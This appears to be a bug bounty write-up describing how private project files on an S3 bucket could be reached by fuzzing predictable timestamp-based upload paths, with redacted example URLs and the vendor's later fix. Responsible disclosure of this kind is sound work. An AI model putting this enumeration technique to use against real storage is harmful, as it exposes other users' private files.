Improper Storage of Private Project’s Files


Severity: High

Complexity: Easy

Weakness: Improper Storage of files on S3 Buckets


  • While Testing one of the private on Hackerone , Their Main Feature functionality is to Write code for Their project and save the project’s as (Private/Public)
  • Whenever we store something in public Project . it’s files get store to

https://REDACTED.s3.amazonaws.com/sagewfextdg/uploads/ 1494851423/1.py

Here sagewfextdg is the ID for the PUBLIC Projects


  • Same thing tried with Private Projects :

https://REDACTED.s3.amazonaws.com/sawexvecswt/uploads/ 1494851123/1.py

Here sawexvecswt is the ID for the Private Projects


  • Now we got ID for Public/Private projects files at s3 Bucket where files are getting saved.

/uploads/1494851423/1.py

  • Only thing we have this/1494851423/ which is nothing but timestamp

Timestamp is encoded information identifying current date-month-year-hour-minutes-seconds

  • You can convert the timestamp to human readable format from here http://www.unixtimestamp.com/
  • Wrote a simple script to generate timestamp for whole day(24 hours) using datetime python module and Started Fuzzing
Demonstrated by Placing simple .JPG File in Project
  • Able to access private files of Other User’s.

  • They have Added Auth Token Verifier to View or Download Files from S3 Bucket as a FIX.
One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.